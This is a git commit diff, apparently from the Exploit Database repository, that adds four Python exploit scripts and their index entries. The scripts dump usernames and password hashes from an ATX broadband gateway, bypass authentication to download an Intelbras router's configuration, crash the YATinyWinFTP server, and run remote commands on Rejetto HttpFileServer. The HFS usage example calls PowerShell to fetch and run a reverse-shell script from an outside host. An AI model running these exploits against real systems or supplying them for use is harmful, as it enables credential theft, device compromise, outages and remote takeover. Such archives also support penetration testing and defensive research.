DB: 2020-12-01
4 changes to exploits/shellcodes YATinyWinFTP - Denial of Service (PoC) ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) Intelbras Router RF 301K 1.1.2 - Authentication Bypass
This commit is contained in:
parent
673a45a464
commit
216721f32c
5 changed files with 150 additions and 0 deletions
45
exploits/hardware/webapps/49124.py
Executable file
45
exploits/hardware/webapps/49124.py
Executable file
|
@ -0,0 +1,45 @@
|
||||||
|
# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
|
||||||
|
# Date: 2020-11-20
|
||||||
|
# Exploit Author: Zagros Bingol
|
||||||
|
# Vendor Homepage: http://www.atx.com
|
||||||
|
# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/
|
||||||
|
# Version: 2.0 and earlier
|
||||||
|
# Tested on: Debian 10 64bit
|
||||||
|
|
||||||
|
-------------------------------------
|
||||||
|
|
||||||
|
Endpoint:
|
||||||
|
http://www.ip/domain.com/inc/user.ini
|
||||||
|
|
||||||
|
--------------------------------------
|
||||||
|
|
||||||
|
Proof-of-Concept:
|
||||||
|
|
||||||
|
#!/usr/bin/python3
|
||||||
|
#License: GNU General Public license v3.0
|
||||||
|
#Author: Zagros Bingol(Zagrosbingol@outlook.com)
|
||||||
|
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import re
|
||||||
|
|
||||||
|
target = input("Target(ex:http://host): \n")
|
||||||
|
port = input("Port: \n")
|
||||||
|
|
||||||
|
|
||||||
|
def sploit(target, port):
|
||||||
|
print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 -
|
||||||
|
Credential Disclosure\n")
|
||||||
|
r = requests.post(target + ":" + port + '/inc/user.ini')
|
||||||
|
searching = re.findall(r"\[.{1,8}\]", str(r.text))
|
||||||
|
print("Usernames:\n")
|
||||||
|
print(", ".join(searching).replace("[", "").replace("]", ""))
|
||||||
|
|
||||||
|
def hash():
|
||||||
|
r = requests.post(target + '/inc/user.ini')
|
||||||
|
searching = re.findall(r"([a-fA-F\d]{32})", str(r.text))
|
||||||
|
print("Hashes:\n")
|
||||||
|
print(", ".join(searching).replace("[", "").replace("]", ""))
|
||||||
|
hash()
|
||||||
|
|
||||||
|
sploit(target, port)
|
37
exploits/hardware/webapps/49126.py
Executable file
37
exploits/hardware/webapps/49126.py
Executable file
|
@ -0,0 +1,37 @@
|
||||||
|
# Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass
|
||||||
|
# Date: 27/11/2020
|
||||||
|
# Exploit Author: Kaio Amaral
|
||||||
|
# Vendor Homepage: https://www.intelbras.com/pt-br/
|
||||||
|
# Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301K_v1.1.2.zip
|
||||||
|
# Version: firmware version 1.1.2
|
||||||
|
# Tested on: kali, android
|
||||||
|
|
||||||
|
# POC
|
||||||
|
|
||||||
|
# 1. nc host port, ex: nc 10.0.0.1 80
|
||||||
|
# 2. GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0
|
||||||
|
|
||||||
|
# Python3
|
||||||
|
|
||||||
|
import socket
|
||||||
|
from time import sleep
|
||||||
|
|
||||||
|
def exploit(host, port=80):
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
pay = "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0\n\n".encode()
|
||||||
|
s.connect((host, port))
|
||||||
|
s.send(pay)
|
||||||
|
sleep(0.2)
|
||||||
|
data = s.recv(17576)
|
||||||
|
if len(data) > 1000:
|
||||||
|
print("[+] Success.")
|
||||||
|
return data.decode()
|
||||||
|
print("[-] Failed. ")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
def file(data):
|
||||||
|
with open("router.cfg", "w") as file:
|
||||||
|
file.write(data[233:])
|
||||||
|
print("[+] File Successfully Written.")
|
||||||
|
|
||||||
|
file(exploit("10.0.0.1"))
|
35
exploits/windows/remote/49127.py
Executable file
35
exploits/windows/remote/49127.py
Executable file
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
|
||||||
|
# Google Dork: None
|
||||||
|
# Date: 20.08.2020
|
||||||
|
# Exploit Author: strider
|
||||||
|
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
|
||||||
|
# Software Link: https://github.com/ik80/YATinyWinFTP
|
||||||
|
# Tested on: Windows 10
|
||||||
|
|
||||||
|
------------------------------[Description]---------------------------------
|
||||||
|
|
||||||
|
This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end.
|
||||||
|
The result it crashes
|
||||||
|
|
||||||
|
-----------------------------[Exploit]---------------------------------------------
|
||||||
|
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
# -*- coding:utf-8 -*-
|
||||||
|
|
||||||
|
import socket, sys
|
||||||
|
|
||||||
|
target = (sys.argv[1], int(sys.argv[2]))
|
||||||
|
buffer = b'A' * 272 + b'\x20'
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
s.connect(target)
|
||||||
|
print(s.recv(1024))
|
||||||
|
s.send(buffer)
|
||||||
|
s.close()
|
||||||
|
|
||||||
|
-----------------------------[how to run]-----------------------------
|
||||||
|
|
||||||
|
C:\> TinyWinFTP.exe servepath port
|
||||||
|
|
||||||
|
~$ python3 exploit.py targetip port
|
||||||
|
|
||||||
|
Boom!
|
29
exploits/windows/webapps/49125.py
Executable file
29
exploits/windows/webapps/49125.py
Executable file
|
@ -0,0 +1,29 @@
|
||||||
|
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
|
||||||
|
# Google Dork: intext:"httpfileserver 2.3"
|
||||||
|
# Date: 28-11-2020
|
||||||
|
# Remote: Yes
|
||||||
|
# Exploit Author: Óscar Andreu
|
||||||
|
# Vendor Homepage: http://rejetto.com/
|
||||||
|
# Software Link: http://sourceforge.net/projects/hfs/
|
||||||
|
# Version: 2.3.x
|
||||||
|
# Tested on: Windows Server 2008 , Windows 8, Windows 7
|
||||||
|
# CVE : CVE-2014-6287
|
||||||
|
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
|
||||||
|
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
|
||||||
|
|
||||||
|
import urllib3
|
||||||
|
import sys
|
||||||
|
import urllib.parse
|
||||||
|
|
||||||
|
try:
|
||||||
|
http = urllib3.PoolManager()
|
||||||
|
url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
|
||||||
|
print(url)
|
||||||
|
response = http.request('GET', url)
|
||||||
|
|
||||||
|
except Exception as ex:
|
||||||
|
print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
|
||||||
|
print(ex)
|
|
@ -18313,6 +18313,7 @@ id,file,description,date,author,type,platform,port
|
||||||
49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
|
49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
|
||||||
49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
|
49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
|
||||||
49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
|
49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
|
||||||
|
49127,exploits/windows/remote/49127.py,"YATinyWinFTP - Denial of Service (PoC)",2020-11-30,strider,remote,windows,
|
||||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -43345,3 +43346,6 @@ id,file,description,date,author,type,platform,port
|
||||||
49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
|
49117,exploits/php/webapps/49117.txt,"House Rental 1.0 - 'keywords' SQL Injection",2020-11-27,boku,webapps,php,
|
||||||
49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
|
49121,exploits/php/webapps/49121.txt,"ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting",2020-11-27,"Vyshnav nk",webapps,php,
|
||||||
49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,
|
49122,exploits/php/webapps/49122.txt,"Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)",2020-11-27,Ex.Mi,webapps,php,
|
||||||
|
49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,
|
||||||
|
49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows,
|
||||||
|
49126,exploits/hardware/webapps/49126.py,"Intelbras Router RF 301K 1.1.2 - Authentication Bypass",2020-11-30,"Kaio Amaral",webapps,hardware,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue